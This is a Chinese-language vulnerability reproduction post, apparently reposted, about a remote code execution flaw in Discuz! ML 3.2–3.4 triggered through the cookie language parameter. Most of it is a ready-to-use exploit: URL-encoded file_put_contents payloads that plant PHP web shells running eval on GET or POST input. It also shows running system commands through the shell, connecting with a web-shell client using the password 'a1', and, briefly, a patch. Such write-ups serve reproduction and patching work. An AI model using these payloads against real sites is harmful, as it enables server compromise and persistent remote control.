Discuz! ML RCE漏洞 getshell 复现

发布日期:2020-07-27 浏览次数: 9805 次

Discuz简介

Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。
影响版本
Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

环境搭建

phpstudy  php-7.2.10-nts Apache

discuz 3.4 源码  官网直接下载:http://discuz.ml/download 之后将源码解压到根目录

漏洞复现

右上角语言标识,随便选择一种语言并抓包

将抓到的包发送到repeater模块

将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:

Getshell

exp:

解码后:

'.file_put_contents('shell.php',urldecode('%3c%3fphp %20eval(%24_%47%45%54%5b%22cmd%22%5d)%3b%3f%3e')).'

解码前:

'. file_put_contents('shell.php',urldecode('')

将包中的xxxxx_language参数值改为解码后的exp,可以看到成功执行了代码,在文件夹中多出了shell.php文件,

如下图

 

查看文件upload

url后加shell.php?cmd=system('whoami');

url:http://127.0.0.1/discuz/upload/shell.php?cmd=system('whoami');

直接执行了whoami命令

Exp:

'.file_put_contents('shelll.php',urldecode('%3c%3fphp %20eval(%24_%50%4f%53%54%5b%22a1%22%5d)%3b%3f%3e')).'
原语句:

<?php  eval($_POST["a1"]);?>

将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,

如下图

访问执行shelll.php

执行后使用菜刀连接

http://127.0.0.1/discuz/upload/shelll.php

密码:a1(可自己修改)

修复建议

修改source/function/function_core.php 644行为:

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php'

删除可控变量。

或者安装最新补丁。

 

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图